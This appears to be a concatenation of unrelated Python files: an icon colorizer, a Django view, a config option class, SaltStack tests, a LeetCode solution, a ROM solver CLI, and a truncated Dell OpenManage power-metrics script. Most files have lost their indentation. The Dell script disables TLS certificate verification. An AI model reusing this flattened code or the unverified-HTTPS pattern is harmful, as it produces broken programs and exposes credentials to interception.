["Win10set/Pink.ico", win10_hue + 340.0, 0.92, 0.99], # pink 300 hsl(340, 83%, 66%)
["Win10set/Purple.ico", win10_hue + 291.0, 0.53, 0.815], # purple 300 hsl(291, 47%, 60%)
["Win10set/Red.ico", win10_hue + 1.0, 0.92, 0.85], # red 400 hsl(1, 83%, 63%)
["Win10set/Teal.ico", win10_hue + 174.0, 0.476, 0.69], # teal 300 hsl(174, 42%, 51%)
["Win10set/Yellow.ico", win10_hue + 54.0, 1.22, 0.91] # yellow 400 hsl(54, 100%, 67%)
]
# Windows 7 & 8 base icon tweak table
# TODO: Windows 7/8 icons set could use more TLC. The LS parts are not tweaked, just copied from the Win10 set above
win7_8_hue = -48.765
win7_8_table = [
["Win7_8set/Black.ico", win7_8_hue + 50.0, 0.0, 0.35], # grey 800 hsl(0, 0%, 26%)
["Win7_8set/Blue gray.ico", win7_8_hue + 200.0, 0.195, 0.73], # blueGrey 400 hsl(200, 15%, 54%)
["Win7_8set/Blue.ico", win7_8_hue + 207.0, 0.99, 0.92], # blue 400 hsl(207, 90%, 61%)
["Win7_8set/Brown.ico", win7_8_hue + 16.0, 0.215, 0.64], # brown 400 hsl(16, 18%, 47%)
["Win7_8set/Cyan.ico", win7_8_hue + 187, 0.79, 0.8], # cyan 300 hsl(187, 71%, 59%)
["Win7_8set/Gray.ico", win7_8_hue + 50.0, 0.0, 1.1], # grey 300 hsl(0, 0%, 88%)
["Win7_8set/Green.ico", win7_8_hue + 123.0, 0.45, 0.77], # green 400 hsl(123, 38%, 57%)
["Win7_8set/Lime.ico", win7_8_hue + 66.0, 0.78, 0.83], # lime 400 hsl(66, 70%, 61%)
["Win7_8set/Orange.ico", win7_8_hue + 36.0, 1.5, 0.88], # orange 300 hsl(36, 100%, 65%)
["Win7_8set/Pink.ico", win7_8_hue + 340.0, 0.92, 0.99], # pink 300 hsl(340, 83%, 66%)
["Win7_8set/Purple.ico", win7_8_hue + 291.0, 0.53, 0.815], # purple 300 hsl(291, 47%, 60%)
["Win7_8set/Red.ico", win7_8_hue + 1.0, 0.92, 0.85], # red 400 hsl(1, 83%, 63%)
["Win7_8set/Teal.ico", win7_8_hue + 174.0, 0.476, 0.69], # teal 300 hsl(174, 42%, 51%)
["Win7_8set/Yellow.ico", win7_8_hue + 54.0, 1.22, 0.91] # yellow 400 hsl(54, 100%, 67%)
]
# Apply hue to a copy of the base image and save it
def apply_color(im, out_path, hue_o, sat_s, lum_s, isWin10):
print("%s:" % out_path)
# PIL uses scalar values
hue_o /= 360.0
assert hue_o <= 1.0
label_x_limit = 1000
# Apply color tweak to each sub-icon from the base input set
out_frames = []
for i in range(im.ico.nb_items):
png_im = im.ico.frame(i)
pxi = png_im.load()
print(" [%u] size: %u" % (i, png_im.width))
# Approximate Win 7/8 label x start position
if not isWin10:
label_x_limit = (png_im.width * 0.6)
new_im = Image.new("RGBA", (png_im.width, png_im.width), "purple")
pxo = new_im.load()
for y in range(png_im.width):
for x in range(png_im.width):
# Pixel from RGB to HLS color space
r, g, b, a = pxi[x, y]
# No need to colorize transparent pixels
if a > 0:
h, l, s = rgb_to_hls(float(r) / 255.0, float(g) / 255.0, float(b) / 255.0)
# Leave the Windows 7/8 folder label alone
# The label is white (zero'ish hue) and blue range(around 90 to 300)
                    if not ((x >= label_x_limit) and ((h < (40.0 / 360.0)) or (h > (100.0 / 360.0)))):
# Tweak pixel
h = (h + hue_o)
# Hue is circular, let it wrap around
if h > 1.0:
h -= 1.0
s = min(1.0, (s * sat_s))
l = min(1.0, (l * lum_s))
# Back to RGB from HLS
r, g, b = hls_to_rgb(h, l, s)
r = min(int(r * 255.0), 255)
g = min(int(g * 255.0), 255)
b = min(int(b * 255.0), 255)
pxo[x, y] = (r, g, b, a)
#new_im.show()
out_frames.append(new_im)
"""
Write out the the modified icon copy.
PIL(Pillow) while supports full loading of multi-size embedded.ico files, it has limited support for writing
them back out. It takes the first/parent image and saves out scaled down filtered thumbnail sizes instead.
The IcoImageFile _save() function was almost complete though. Here is a copy of that code with the copy part
replaced with individual "frame" writes instead.
As an added bonus from the code, it saves the icon sections out as compressed .png sections (supported since Windows Vista)
which makes our icon sets much smaller than the default BMP section format that most icon tools use.
"""
fp = open(base_path + out_path, 'wb')
fp.write(b"\0\0\1\0") # Magic
fp.write(struct.pack("<H", len(out_frames))) # idCount(2)
offset = (fp.tell() + len(out_frames) * 16)
for ni in out_frames:
width, height = ni.width, ni.height
# 0 means 256
fp.write(struct.pack("B", width if width < 256 else 0)) # bWidth(1)
fp.write(struct.pack("B", height if height < 256 else 0)) # bHeight(1)
fp.write(b"\0") # bColorCount(1)
fp.write(b"\0") # bReserved(1)
fp.write(b"\0\0") # wPlanes(2)
fp.write(struct.pack("<H", 32)) # wBitCount(2)
image_io = io.BytesIO()
ni.save(image_io, "png")
image_io.seek(0)
image_bytes = image_io.read()
bytes_len = len(image_bytes)
fp.write(struct.pack("<I", bytes_len)) # dwBytesInRes(4)
fp.write(struct.pack("<I", offset)) # dwImageOffset(4)
current = fp.tell()
fp.seek(offset)
fp.write(image_bytes)
offset = offset + bytes_len
fp.seek(current)
fp.close()
print(" ")
# From Windows base icon image to our color sets
def process_icon_base(in_file, nfo_table, isWin10):
# Load base icon image
im = Image.open(in_file)
#print(in_file, im.info, im.format, im.size, im.mode)
# Build color sets
for e in nfo_table:
apply_color(im, e[0], e[1], e[2], e[3], isWin10)
# Windows 10
print("-- Creating Windows 10 set..")
process_icon_base("Windows10.ico", win10_table, True)
print("-- Creating Windows 7 & 8 set..")
process_icon_base("Windows7_8_rgba.ico", win7_8_table, False)
|
from django import forms
from django.conf import settings
from django.http import HttpResponse, HttpResponseRedirect, Http404
from manager import models as pmod
from . import templater
import decimal, datetime
# This page allows an employee to make or edit a store
def process_request(request):
if not request.user.is_authenticated():
return HttpResponseRedirect('/manager/login')
if request.user.is_staff == False:
return HttpResponseRedirect('/manager/')
'''Shows the list of stores'''
if request.urlparams[0] == "new":
form = StoreForm(initial ={
'locationName': "",
'manager': "",
'street': "",
'city': "",
'state': "",
'zipcode': "",
'phone': "",
})
else:
store = pmod.Store.objects.get(id=request.urlparams[0])
form = StoreForm(initial ={
'locationName': store.locationName,
'manager': store.manager,
'street': store.street,
'city': store.city,
'state': store.state,
'zipcode': store.zipcode,
'phone': store.phone,
})
if request.method == 'POST':
form = StoreForm(request.POST)
if form.is_valid():
if request.urlparams[0] == "new":
store = pmod.Store()
store.locationName = form.cleaned_data['locationName']
store.manager = form.cleaned_data['manager']
store.street = form.cleaned_data['street']
store.city = form.cleaned_data['city']
store.state = form.cleaned_data['state']
store.zipcode = form.cleaned_data['zipcode']
store.phone = form.cleaned_data['phone']
store.active = True
store.save()
return HttpResponseRedirect('/manager/stores')
tvars = {
'form': form,
}
return templater.render_to_response(request, 'store_details.html', tvars)
class StoreForm(forms.Form):
locationName = forms.CharField(required=False, label='Location Name', widget=forms.TextInput(attrs={'class':'form-control'}))
manager = forms.ModelChoiceField(queryset=pmod.User.objects.filter(is_staff=True), label="Manager", widget=forms.Select(attrs={'class':'form-control'}))
street = forms.CharField(required=False, label='Street', widget=forms.TextInput(attrs={'class':'form-control'}))
city = forms.CharField(required=False, label='City', widget=forms.TextInput(attrs={'class':'form-control'}))
state = forms.CharField(required=False, label='State', widget=forms.TextInput(attrs={'class':'form-control'}))
zipcode = forms.CharField(required=False, label='Zipcode', widget=forms.TextInput(attrs={'class':'form-control'}))
phone = forms.CharField(required=False, label='Phone', widget=forms.TextInput(attrs={'class':'form-control'}))
#def clean_store_text(self): |
import json
from nativeconfig.exceptions import DeserializationError, ValidationError, InitializationError
from nativeconfig.options.base_option import BaseOption
class DictOption(BaseOption):
"""
DictOption represents Python dict in config. DictOption can contain other Options as values of dict.
"""
def __init__(self, name, value_option=None, **kwargs):
"""
        Accepts all the arguments of BaseOption except choices.
"""
super().__init__(name, getter='get_dict_value', setter='set_dict_value', **kwargs)
if value_option:
from nativeconfig.options import ArrayOption
if isinstance(value_option, BaseOption) \
and not isinstance(value_option, ArrayOption) \
and not isinstance(value_option, DictOption):
self._value_option = value_option
else:
raise InitializationError("Value option must be instance of one of base options except array and dict!")
else:
self._value_option = None
def serialize(self, value):
serializable_dict = {}
if isinstance(self._value_option, BaseOption):
for k, v in value.items():
serialized_v = self._value_option.serialize(v)
serializable_dict.update({k: serialized_v})
return serializable_dict
else:
return value
def deserialize(self, raw_value):
try:
if isinstance(self._value_option, BaseOption):
deserialized_dict = {}
for k, v in raw_value.items():
deserialized_dict.update({k: self._value_option.deserialize(v)})
value = deserialized_dict
else:
value = raw_value
except DeserializationError:
raise DeserializationError("Unable to deserialize \"{}\" into dict!".format(raw_value), raw_value)
else:
return value
def serialize_json(self, value):
serializable_dict = {}
if isinstance(self._value_option, BaseOption):
for k, v in value.items():
serialized_v = self._value_option.serialize(v)
serializable_dict.update({k: serialized_v})
return json.dumps(serializable_dict)
else:
return json.dumps(value)
def deserialize_json(self, json_value):
try:
value = json.loads(json_value)
except ValueError:
raise DeserializationError("Invalid json: \"{}\"".format(json_value), json_value)
else:
return value
def validate(self, value):
super().validate(value)
try:
valid_val = dict(value)
except (ValueError, TypeError):
raise ValidationError("Invalid dict \"{}\"!".format(value), value)
|
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Rahul Handay <[email protected]>`
'''
# Import Python Libs
from __future__ import absolute_import
# Import Salt Testing Libs
from salttesting import TestCase, skipIf
from salttesting.helpers import ensure_in_syspath
from salttesting.mock import (
MagicMock,
patch,
NO_MOCK,
NO_MOCK_REASON
)
ensure_in_syspath('../../')
# Import Salt Libs
from salt.states import win_servermanager
# Globals
win_servermanager.__salt__ = {}
win_servermanager.__opts__ = {}
@skipIf(NO_MOCK, NO_MOCK_REASON)
class WinServermanagerTestCase(TestCase):
'''
Validate the win_servermanager state
'''
def test_installed(self):
'''
Test to install the windows feature
'''
ret = {'name': 'salt',
'changes': {},
'result': True,
'comment': ''}
mock = MagicMock(side_effect=['salt', 'stack', 'stack'])
mock1 = MagicMock(return_value={'Success': 'True'})
with patch.dict(win_servermanager.__salt__,
{"win_servermanager.list_installed": mock,
"win_servermanager.install": mock1}):
ret.update({'comment': 'The feature salt is already installed'})
self.assertDictEqual(win_servermanager.installed('salt'), ret)
with patch.dict(win_servermanager.__opts__, {"test": True}):
ret.update({'changes': {'feature':
'salt will be installed'
' recurse=False'}, 'result': None,
'comment': ''})
self.assertDictEqual(win_servermanager.installed('salt'), ret)
with patch.dict(win_servermanager.__opts__, {"test": False}):
ret.update({'changes': {'feature': {'Success': 'True'}},
'result': True, 'comment': 'Installed salt'})
self.assertDictEqual(win_servermanager.installed('salt'),
ret)
def test_removed(self):
'''
Test to remove the windows feature
'''
ret = {'name': 'salt',
'changes': {},
'result': True,
'comment': ''}
mock = MagicMock(side_effect=['stack', 'salt', 'salt'])
mock1 = MagicMock(return_value={'Success': 'True'})
with patch.dict(win_servermanager.__salt__,
{"win_servermanager.list_installed": mock,
"win_servermanager.remove": mock1}):
ret.update({'comment': 'The feature salt is not installed'})
self.assertDictEqual(win_servermanager.removed('salt'), ret)
with patch.dict(win_servermanager.__opts__, {"test": True}):
ret.update({'changes': {'feature':
'salt will be removed'},
'result': None, 'comment': ''})
self.assertDictEqual(win_servermanager.removed('salt'), ret)
with patch.dict(win_servermanager.__opts__, {"test": False}):
ret.update({'changes': {'feature': {'Success': 'True'}},
'result': True})
self.assertDictEqual(win_servermanager.removed('salt'),
ret)
if __name__ == '__main__':
from integration import run_tests
run_tests(WinServermanagerTestCase, needs_daemon=False)
|
from dataclasses import dataclass
from bindings.gmd.md_geometric_objects_type import MdGeometricObjectsType
__NAMESPACE__ = "http://www.isotc211.org/2005/gmd"
@dataclass
class MdGeometricObjects(MdGeometricObjectsType):
class Meta:
name = "MD_GeometricObjects"
namespace = "http://www.isotc211.org/2005/gmd"
|
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
import math
from collections import OrderedDict
from ..util import import_
import numpy as np
from ..symbolic import SymbolicSys, TransformedSys, symmetricsys
sp = import_('sympy')
ys = [
np.array([0.43976714474700634, 0.10031118340143896, 0.38147224769822524,
1.7675704061619617e-11]),
np.array([0.00064313123504933787, 0.00014677490343001067, 9.536739572030514e-05, 1.6877253332428752e-11])
]
ps = [
[328.65, 39390, -135.3, 18010, 44960, 48.2,
49320, -114.6, 1780, -47941.550570419757,
107.24619394365152, 67486.458673807123, -170.63617364489184],
[321.14999999999998, 39390, -135.30000000000001, 18010, 44960, 48.200000000000003,
49320, -114.59999999999999, 1780, -34400.547966379738,
-2.865040967667511, 93065.338440593958, 5.7581184659305222]
]
def _get_cetsa_odesys(molar_unitless, loglog, NativeSys=None, explicit_NL=False, MySys=None):
# Never mind the details of this test case, it is from a real-world application.
names = 'N U NL L A'.split()
params = OrderedDict([
('T', 'T'),
('Ha_f', r'\Delta_f\ H^\neq'),
('Sa_f', r'\Delta_f S^\neq'),
('dCp_u', r'\Delta_u\ C_p'),
('He_u', r'\Delta_u H'),
('Tm_C', 'T_{m(C)}'),
('Ha_agg', r'\Delta_{agg}\ H^\neq'),
('Sa_agg', r'\Delta_{agg}\ S^\neq'),
('dCp_dis', r'\Delta_{dis}\ C_p'),
('Ha_as', r'\Delta_{as}\ H^\neq'),
('Sa_as', r'\Delta_{as}\ S^\neq'),
('He_dis', r'\Delta_{dis}\ H'),
('Se_dis', r'\Delta_{dis}\ S'),
])
param_keys = list(params.keys())
def Eyring(dH, dS, T, R, kB_over_h, be):
return kB_over_h * T * be.exp(-(dH - T*dS)/(R*T))
def get_rates(x, y, p, be=math, T0=298.15, T0C=273.15,
R=8.3144598, # J K**-1 mol**-1, J = Nm, but we keep activation energies in Joule)
kB_over_h=1.38064852e-23 / 6.62607004e-34): # K**-1 s**-1
pd = dict(zip(param_keys, p))
He_u_T = pd['He_u'] + pd['dCp_u'] * (pd['T'] - T0)
He_dis_T = pd['He_dis'] + pd['dCp_dis'] * (pd['T'] - T0)
Se_u = pd['He_u']/(T0C + pd['Tm_C']) + pd['dCp_u']*be.log(pd['T']/T0)
Se_dis = pd['Se_dis'] + pd['dCp_dis']*be.log(pd['T']/T0)
def C(k):
return y[names.index(k)]
return {
'unfold': C('N')*Eyring(He_u_T + pd['Ha_f'], pd['Sa_f'] + Se_u, pd['T'], R, kB_over_h, be),
'fold': C('U')*Eyring(pd['Ha_f'], pd['Sa_f'], pd['T'], R, kB_over_h, be),
'aggregate': C('U')*Eyring(pd['Ha_agg'], pd['Sa_agg'], pd['T'], R, kB_over_h, be),
'dissociate': C('NL')*Eyring(He_dis_T + pd['Ha_as'], Se_dis + pd['Sa_as'], pd['T'], R, kB_over_h, be),
'associate': C('N')*C('L')*Eyring(pd['Ha_as'], pd['Sa_as'], pd['T'], R, kB_over_h, be) / molar_unitless
}
def f(x, y, p, be=math):
r = get_rates(x, y, p, be)
dydx = {
'N': r['fold'] - r['unfold'] + r['dissociate'] - r['associate'],
'U': r['unfold'] - r['fold'] - r['aggregate'],
'A': r['aggregate'],
'L': r['dissociate'] - r['associate'],
'NL': r['associate'] - r['dissociate']
}
return [dydx[k] for k in (names if explicit_NL else names[:-1])]
if loglog:
logexp = sp.log, sp.exp
if NativeSys:
class SuperClass(TransformedSys, NativeSys):
pass
else:
SuperClass = TransformedSys
MySys = symmetricsys(
logexp, logexp, SuperClass=SuperClass, exprs_process_cb=lambda exprs: [
sp.powsimp(expr.expand(), force=True) for expr in exprs])
else:
MySys = NativeSys or SymbolicSys
return MySys.from_callback(f, len(names) - (0 if explicit_NL else 1), len(param_keys),
names=names if explicit_NL else names[:-1])
|
from __future__ import unicode_literals
import yaml
from pathlib import Path
import os
from prompt_toolkit import prompt
import pandas as pd
from src.pipeline_components.tile_creator import TileCreator
from src.pipeline_components.tile_downloader import TileDownloader
from src.pipeline_components.tile_processor import TileProcessor
from src.pipeline_components.tile_updater import TileCoordsUpdater
from src.utils.geojson_handler_utils import GeoJsonHandler
def main():
# ------- Read configuration -------
config_file = 'config.yml'
with open(config_file, 'rb') as f:
conf = yaml.load(f, Loader=yaml.FullLoader)
run_tile_creator = conf.get('run_tile_creator', 0)
run_tile_downloader = conf.get('run_tile_downloader', 0)
run_tile_processor = conf.get('run_tile_processor', 0)
run_tile_updater = conf.get('run_tile_coords_updater', 0)
tile_coords_path = conf.get('tile_coords_path', 'data/coords/TileCoords.pickle')
geojson_path = conf.get('geojson_path', 'utils/deutschlandGeoJSON/2_bundeslaender/1_sehr_hoch.geo.json')
downloaded_path = conf.get('downloaded_path', 'logs/processing/DownloadedTiles.csv')
processed_path = conf.get('processed_path','logs/processing/Processed.csv')
# ------- GeoJsonHandler provides utility functions -------
nrw_handler = GeoJsonHandler(geojson_path)
# ------- TileCreator creates pickle file with all tiles in NRW and their respective minx, miny, maxx, maxy coordinates -------
if run_tile_creator:
print("Starting to create a pickle file with all bounding box coordinates for tiles within NRW ... This will take a while")
tileCreator = TileCreator(configuration=conf, polygon=nrw_handler.polygon)
tileCreator.defineTileCoords()
        print('Pickle file has been successfully created')
# Tile_coords is a list of tuples. Each tuple specifies its respective tile by minx, miny, maxx, maxy.
tile_coords = nrw_handler.returnTileCoords(path_to_pickle=Path(tile_coords_path))
print(f'{len(tile_coords)} tiles have been identified.')
# ------- TileDownloader downloads tiles from openNRW in a multi-threaded fashion -------
if run_tile_downloader:
        print('Starting to download ' + str(len(tile_coords)) + ' tiles. This will take a while.')
downloader = TileDownloader(configuration=conf, polygon=nrw_handler.polygon, tile_coords=tile_coords)
if os.path.exists(Path(downloaded_path)):
# Load DownloadedTiles.csv file
downloadedTiles_df = pd.read_table(downloaded_path, header=None)
print(f"{downloadedTiles_df[0].nunique()} unique tiles have been successfully downloaded.")
if run_tile_processor:
tileProcessor = TileProcessor(configuration=conf, polygon=nrw_handler.polygon)
tileProcessor.run()
if os.path.exists(processed_path):
            # Load Processed.csv file
processedTiles_df = pd.read_table(processed_path, header=None)
print(f"{processedTiles_df[0].nunique()} unique tiles have been successfully processed.")
if run_tile_updater:
updater = TileCoordsUpdater(configuration=conf, tile_coords=tile_coords)
updater.update()
if __name__ == '__main__':
main() |
import os
#get pure terachem gradients for comparison
pdbdir = "/home/xuyanting/qr-tests-p1/01_finalised"
coords="/home/xuyanting/qr-tests-p1/01_finalised/"
work_dir ="/home/xuyanting/sp/"
pdbs =[]
for pdb_file in os.listdir(pdbdir):
# pdbs.append(os.path.join(pdbdir,pdb_file))
pdbs.append(pdb_file[:-4])
template = """run gradient
$multibasis
Se lanl2dz_ecp
Cl lanl2dz_ecp
Cd lanl2dz_ecp
Zn lanl2dz_ecp
Mg lanl2dz_ecp
$end
basis sto-3g
scf diis+a
coordinates """
template2 ="""
gpumem 512
charge 6
seed 1351351
maxit 200
threall 1e-12
pointcharges no
gpus 4
watcheindiis yes
method rhf
dftd yes
end
"""
def pbs():
for pdb in pdbs:
with open(work_dir+pdb+".sp","w") as f:
f.write(template + coords + pdb + ".pdb " +template2)
pbs()
|
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
def checkTen(n, f):
flag = f
temp = n
while (n is not None):
n.val += flag
if n.val >= 10:
n.val -= 10
flag = 1
else:
flag = 0
temp = n
n = n.next
if flag == 1:
temp.next = ListNode(1)
class Solution(object):
def addTwoNumbers(self, l1, l2):
"""
:type l1: ListNode
:type l2: ListNode
:rtype: ListNode
"""
flag = 0
result = ListNode(flag)
temp = result
last = None
while(l1 is not None and l2 is not None):
temp.val += l1.val + l2.val
if temp.val >= 10:
temp.val -= 10
flag = 1
else:
flag = 0
temp.next = ListNode(flag)
last = temp
temp = temp.next
l1 = l1.next
l2 = l2.next
if l1 is None:
if l2 is not None:
last.next = l2
checkTen(l2, flag)
else:
if flag == 1:
last.next = ListNode(flag)
else:
last.next = None
return result
if l2 is None:
last.next = l1
checkTen(l1, flag)
return result
'''
test:
(1)
(9,2)
-> (0,3)
(2)
(8,9,9)
->(0,0,0,1)
(5)
(5)
->(0,1)
'''
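# Runnable sketch of the first and third test cases listed above; the helper
# names below are illustrative, not part of the original exercise.
def _build_list(digits):
    head = ListNode(digits[0])
    node = head
    for d in digits[1:]:
        node.next = ListNode(d)
        node = node.next
    return head
def _to_digits(node):
    out = []
    while node is not None:
        out.append(node.val)
        node = node.next
    return out
if __name__ == '__main__':
    s = Solution()
    print(_to_digits(s.addTwoNumbers(_build_list([1]), _build_list([9, 2]))))  # expected [0, 3]
    print(_to_digits(s.addTwoNumbers(_build_list([5]), _build_list([5]))))     # expected [0, 1]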
|
#!/usr/bin/env python3
from zorrom import solver
from zorrom.util import add_bool_arg
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
description='Guess mask ROM layout based on constraints')
parser.add_argument(
'--bytes',
required=True,
help=
'Constraints as offset:byte,offset:byte,.. offset:byte:mask is also allowed'
)
parser.add_argument('--verbose', action='store_true', help='')
parser.add_argument('--all', action='store_true', help='')
add_bool_arg(parser, '--invert', default=None, help='')
parser.add_argument('--rotate', type=int, default=None, help='')
parser.add_argument('--bin-out',
default=None,
help='Require a single match')
parser.add_argument('--txt-out',
default=None,
help='Require a single match')
add_bool_arg(parser, '--flipx', default=None, help='')
parser.add_argument('--interleave', type=int, default=1, help='')
parser.add_argument('--interleave-dir', default=None, help='')
parser.add_argument('--layout-alg', type=str, default=None, help='')
parser.add_argument('--write-thresh', type=float, default=None, help='')
parser.add_argument('--word-bits', type=int, default=8, help='')
parser.add_argument('--words', type=int, default=None, help='')
parser.add_argument('--endian', default=None, help='')
parser.add_argument('fn_in', help='.txt file in')
parser.add_argument('dir_out', nargs='?', help='Write top .bin file')
args = parser.parse_args()
solver.run(args.fn_in,
solver.parse_ref_words(args.bytes),
args.dir_out,
bin_out=args.bin_out,
txt_out=args.txt_out,
all=args.all,
invert_force=args.invert,
rotate_force=args.rotate,
flipx_force=args.flipx,
interleave_force=args.interleave,
interleave_dir_force=args.interleave_dir,
layout_alg_force=args.layout_alg,
write_thresh=args.write_thresh,
word_bits=args.word_bits,
words=args.words,
endian_force=args.endian,
verbose=args.verbose)
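# Example invocation (hypothetical script and file names; the flags are the ones
# declared in the argparse setup above, and the byte values are illustrative --
# see the --bytes help string for the exact offset:byte syntax):
#
#   python3 solve_layout.py --bytes 0:65,16:66 --word-bits 8 rom.txt out_dir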
|
#
# _author_ = Mahendran P <[email protected]>
#
# Copyright (c) 2021 Dell EMC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
#### Synopsis
Script to get different Power Manager Metrics for groups which are being monitored by Power Manager
#### Description
This script exercises the OpenManage Enterprise REST API to get different Power Manager Metrics for groups at different time duration which are being monitored by Power Manager.
- For authentication X-Auth is used over Basic Authentication
- Note that the credentials entered are not stored to disk.
- Use "get_power_manager_monitoring_list.py" to get group ID
#### Python Example
python get_power_manager_group_metrics.py --ip <xx> --username <username> --password <pwd> --groupID <ID of a Group> --metricType <Metric Supported> --duration <Duration> --sort <Sort Order>
Output:
==========================================================================================
Power Manager Metrics for group ID -> 10313 collected in Six_hours time window
==========================================================================================
METRIC_TYPE METRIC_VALUE COLLECTED_AT
Maximum_system_power_consumption 136.0 2020-03-22 06:45:28.891437
Minimum_system_power_consumption 133.0 2020-03-22 06:45:28.891437
Average_system_power_consumption 133.0 2020-03-22 06:45:28.891437
Maximum_system_power_consumption 136.0 2020-03-22 07:00:18.443143
"""
# Import the modules required for this script
import argparse
import json,csv
import sys
import collections
from argparse import RawTextHelpFormatter
# Import the modules required for this script
#from requests.packages.urllib3.exceptions import InsecureRequestWarning
import urllib3
import requests
from datetime import datetime
from columnar import columnar
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
from pathlib import Path
home = str(Path.home()) + "/em-metrics/"
# Metric Type dictionary to display the output for better reading
metricType_dictionary = {
1: "Maximum_system_power_consumption",
2: "Minimum_system_power_consumption",
3: "Average_system_power_consumption",
4: "Instant_system_power",
5: "Maximum_Inlet_Temperature",
6: "Minimum_Inlet_Temperature",
7: "Average_Inlet_Temperature",
8: "Instant_Inlet_Temperature",
9: "Maximum_CPU_utilization",
10: "Minimum_CPU_utilization",
11: "Average_CPU_utilization",
12: "Maximum_memory_utilization",
13: "Minimum_memory_utilization",
14: "Average_memory_utilization",
15: "Maximum_IO_utilization",
16: "Minimum_IO_utilization",
17: "Average_IO_utilization",
18: "System_Air_Flow"}
# Duration dictionary to display the output for better reading
duration_dictionary = {
0: "Recent",
1: "One_hour",
2: "Six_hours",
3: "Twelve_hours",
4: "One_day",
5: "Seven_Days",
6: "One_Month",
7: "Three_Months",
8: "Six_Months",
9: "One_Year"}
def get_power_manager_group_metrics(ip_address, user_name, password, groupID, metricType, duration, sort):
""" Authenticate with OpenManage Enterprise, get power manager Group metrics"""
# Defining Session URL & headers
session_url = 'https://%s/api/SessionService/Sessions' % ip_address
headers = {'content-type': 'application/json'}
# Define Payload for posting session API
user_details = {'UserName': user_name,
'Password': password,
'SessionType': 'API'}
# Define metric URL
metric_url = "https://%s/api/MetricService/Metrics" % ip_address
# Payload for posting metric API
metrics_payload = {"PluginId": "2F6D05BE-EE4B-4B0E-B873-C8D2F64A4625",
"EntityType": 1,
"EntityId": int(groupID),
"MetricTypes": metricType,
"Duration": int(duration),
"SortOrder": int(sort)}
# Define OUTPUT header & data format
output_column_headers = ['Metric_Type', 'Metric_Value', 'Collected_at']
output_column_data = []
# Create the session with OpenManage Enterprise
session_info = requests.post(session_url, verify=False,
data=json.dumps(user_details),
headers=headers)
    # If the session could not be created, report the error to the user
    if session_info.status_code not in (200, 201):
session_json_data = session_info.json()
if 'error' in session_json_data:
error_content = session_json_data['error']
if '@Message.ExtendedInfo' not in error_content:
print("Unable to create a session with %s" % ip_address)
else:
extended_error_content = error_content['@Message.ExtendedInfo']
                print(
                    "Unable to create a session with %s. See the ExtendedInfo below for more information" % ip_address)
print(extended_error_content[0]['Message'])
else:
print("Unable to create a session with %s. Please try again later" % ip_address)
else:
headers['X-Auth-Token'] = session_info.headers['X-Auth-Token']
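        # Subsequent REST calls in this function authenticate using this X-Auth-Token header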
# Group Metric Post API call with OpenManage Enterprise
group_metric_response = requests.post(metric_url,
data=json.dumps(metrics_payload), headers=headers, verify=False)
group_metric_json_data = group_metric_response.json()
        # If the group metric API call fails, report the error to the user
        if group_metric_response.status_code not in (200, 201):
if 'error' in group_metric_json_data:
error_content = group_metric_json_data['error']
if '@Message.ExtendedInfo' not in error_content:
print("Unable to retrieve Power Manager metric from %s" % ip_address)
else:
extended_error_content = error_content['@Message.ExtendedInfo']
                    print(
                        "Unable to retrieve Power Manager metrics from %s. See the ExtendedInfo below for more information" % ip_address)
print(extended_error_content[0]['Message'])
else:
print("Unable to retrieve Power Manager metric from %s" % ip_address)
else:
group_metric_content = json.loads(group_metric_response.content)
if group_metric_content:
                # For every element in the metric response, record its type, value and timestamp
for metric_elem in group_metric_content["Value"]:
group_metric_data = [metricType_dictionary[int(metric_elem["Type"])], metric_elem["Value"],
metric_elem["Timestamp"]]
output_column_data.append(group_metric_data)
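                # For illustration only (values are hypothetical): after this loop each entry in
                # output_column_data looks like
                #   ["Maximum_Inlet_Temperature", 24.0, "2020-03-22 06:45:28.891437"]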
                # Group the readings by timestamp (truncated to the minute), so that each
                # timestamp maps to its collected metrics: {date: {metric_name: value, ...}}
                dt_group_metrics = {}
                for t in output_column_data:
                    dt = datetime.strptime(t[2], "%Y-%m-%d %H:%M:%S.%f").strftime("%Y-%m-%d %H:%M")
                    if dt in dt_group_metrics:
                        dt_group_metrics[dt].update({t[0]: t[1]})
                    else:
                        dt_group_metrics[dt] = {t[0]: t[1]}
                # Sort the grouped readings chronologically and write one CSV row per timestamp:
                # <timestamp>,<maximum inlet temperature>,<average inlet temperature>
                sorted_metrics = collections.OrderedDict(sorted(dt_group_metrics.items()))
                with open(home + 'output/partial_temperature_metrics.csv', mode='w', newline='') as metrics_file:
                    csv_metrics = csv.writer(metrics_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
                    for k, v in sorted_metrics.items():
                        csv_metrics.writerow([k, v['Maximum_Inlet_Temperature'],
                                              v['Average_Inlet_Temperature']])
else:
print("No Power Manager Metrics for group ID -> %s collected in %s time window" % (
groupID, duration_dictionary[int(duration)]))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=__doc__, formatter_class=RawTextHelpFormatter)
parser.add_argument("--ip", "-i", required=True, help="OpenManage Enterprise IP <- Mandatory")
parser.add_argument("--username", "-u", required=False,
help="Username for OpenManage Enterprise <- Optional; default = admin", default="admin")
parser.add_argument("--password", "-p", required=True, help="Password for OpenManage Enterprise <- Mandatory")
parser.add_argument("--groupID", "-id", required=True,
help="ID of a Group <- Power Manager Metrics need to be fetched <- Mandatory")
parser.add_argument("--duration", "-d", required=False,
                        help='''Duration of the period over which the metrics were collected. <- Optional; default = 0; See the supported values below:
0 Recent
1 One hour
2 Six hours
3 Twelve hours
4 One day
5 Seven Days
6 One Month
7 Three Months
8 Six Months
9 One Year
''', default=0)
parser.add_argument("--sort", "-s", required=False,
                        help='''Sort order of the returned metrics. <- Optional; default = 0; See the supported values below:
0 Descending
1 Ascending
''', default=0)
args = parser.parse_args()
metricType="5,6,7"
mt_list = []
if metricType:
if "," in metricType:
for i in metricType.split(","):
if not i.isdigit():
print(
